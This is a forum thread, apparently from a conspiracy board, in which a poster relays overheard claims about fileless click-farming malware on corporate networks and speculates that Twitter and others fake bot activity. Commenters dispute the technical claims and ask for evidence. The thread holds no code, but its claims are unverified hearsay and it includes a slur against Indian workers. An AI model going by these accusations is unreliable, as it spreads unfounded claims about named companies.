Fileless malware is being used to distort the narrative. ( conspiracy )

submitted by senpaithatignoresyou

Recently fileless malware is being discovered in computers across the world. What makes this so hard to detect is that it does not have a file or "artifact" on the computer to be found by antivirus software. Because it does not have to write anything to a computer, it can also run on any operating system, including unix.

So what are these programs mostly doing? they are executing scripts that encrypt their traffic, and farming clicks.

They are not keylogging, they are not configuring ports, they are farming clicks.

This raises tons of questions: Is it more profitable for a cybercriminal to farm clicks than do industrial espionage? Are the companies deliberately putting this on their computers, pretending to be hacked, then making extra cash on the side to change the narrative?

We left reddit because of the vote manipulation. We see all the bot twitter posts, but we never asked where they came from. We assumed it was from china, but if a shareholder where to sue twitter or reddit over paid vote manipulation, then the click farms in china would easily be discovered.

With the discovery of the file less malware thanks to the leaked NSA tools, we now have a more disturbing picture: Many computers are compromised, and are running hard to find botnets that solely generate site traffic and manipulate online marketing.

dunrambai

"Fileless" malware does leave artifacts. The artifacts are just not filesystem artifacts. The popular commodity malware poster is easy enough to figure out. I'd be interested if you actually have examples/evidence of bots performing Twitter, Facebook, or reddit manipulation.

senpaithatignoresyou

This is where it got interesting, the first place they went was "letsnecrypt.org" where it appears to have encrypted the traffic, and that is as far as we could tell.

I have no evidence of it going to the social media sites. If i did, i would have made a post in v/infosec . I just have a theory. IF there is a better way for them to make money off of generating site traffic, i would be very open to hear that.

I have had this suspicion that twitter may be behind the bot farms in china, in an attempt to hype up how much the service is used to dupe investors. Now that the cat is out of the bag, i would bet that they would try to find a subtle way to keep this sham going.

Then again, corporate cybersecurity is a massive inside joke. I have noticed that all the big accounting firms have begun this massive push to hire IT auditors, and the insurance companies have not too. I suspect that by next year, insurance cybersecurity audits are going to become the new pain in the ass for everyone.

bezzy

If malare is only in RAM then a simple reboot wipes it. Click farming malware is mostly used to generate ad revenue.

senpaithatignoresyou

Not on the ram. This was also on a unix machine, windows 7 and 10 machines too.

MR_CHNYD

I don't understand how you are unaware of where it resides yet you have it detected. Are you very IT savvy or not so much? Any more info appreciated.

senpaithatignoresyou

I would wager i am about a 2 out of 10 with IT. I am not nearly as tech savvy as i want to be. the more i work with it, the more i realize it is incredibly complex. The scary bit, is none of the corporate people bother to learn the basics of how their expensive networks operate.

Part of why i don't have that many details on this, is i am not working directly with the people who are responding to it. This is stuff i have overheard.

bezzy

What endpoint detection vendor/product detected it?

senpaithatignoresyou

crowdstrike

And if you want to enter a new world of creepy, that one would make 15 new topics here. IF your company uses it, **DONT'T **work from home.

10233264?

as in; DNC leaks—crowdstrike?

bezzy

We don't.

bezzy

Fileless means in RAM. There is no other place for data to be. Either it's on disk and therefore there are files or it is not and then it's in RAM. If data is not written to disk and does not exist in RAM, then where is it? In the cache? Search fileless malware. It's all about existing in ram and leveraging something like PS. The only way to achieve persistence across reboots is to write to a disk, at which point it isn't truly fileless.

WarGy

It could be in the CPU cache, couldn't it? There's also been a few cases of malware written into the BIOS flash memory.

bezzy

Perhaps, I don't know enough about CPUs. At any rate that would be a very tiny virus. If something is written to BIOS then it still is not fileless.

pisslam

my recommendation is to run firefox or brave in firejail with apparmor. if you set up firejail with the overlay function, nothing is written to the disk and the program has no idea it has been jailed.

senpaithatignoresyou

This was on multiple corporate networks: on unix AND linux machines.

We think FIN7 made it, because the new diagnostic tools think it was installed around April-May, around the same time they where fucking with chipotle and other companies.

dunrambai

Sounds like kovter and not fin7. Hashes, details, persistence mechanisms?

senpaithatignoresyou

From what i understand, in one instance it was running powershell scripts that it read off of a text file.

It also had scripts that worked on other operating systems in other text files as well.

Tancred

Easily discovered by monitoring traffic. Run Wireshark.

senpaithatignoresyou

NOPE.

Wire shark did not find it, nor did it show up in the splunk logs, and symantic did not find it, nor did the god damn Indians or the SOC that they paid good money for.

It got found when we had two vendors put their endpoint protections up. One vendor found it(the most expensive one), the other did not.

They rolled out that end point protection on a few thousand more machines, and now it found several more instances.

Tancred

How does it get by wire shark?

senpaithatignoresyou

I do not know.

I am hoping that it is just corporate IT being inept or under budget and staffed, and not something really nasty.

The problem is that it is not just the company i am at, but other people in other companies finding this. From what i understand there was an improvement in end point protection over the last few months to look for stuff like this, and now they are finding it.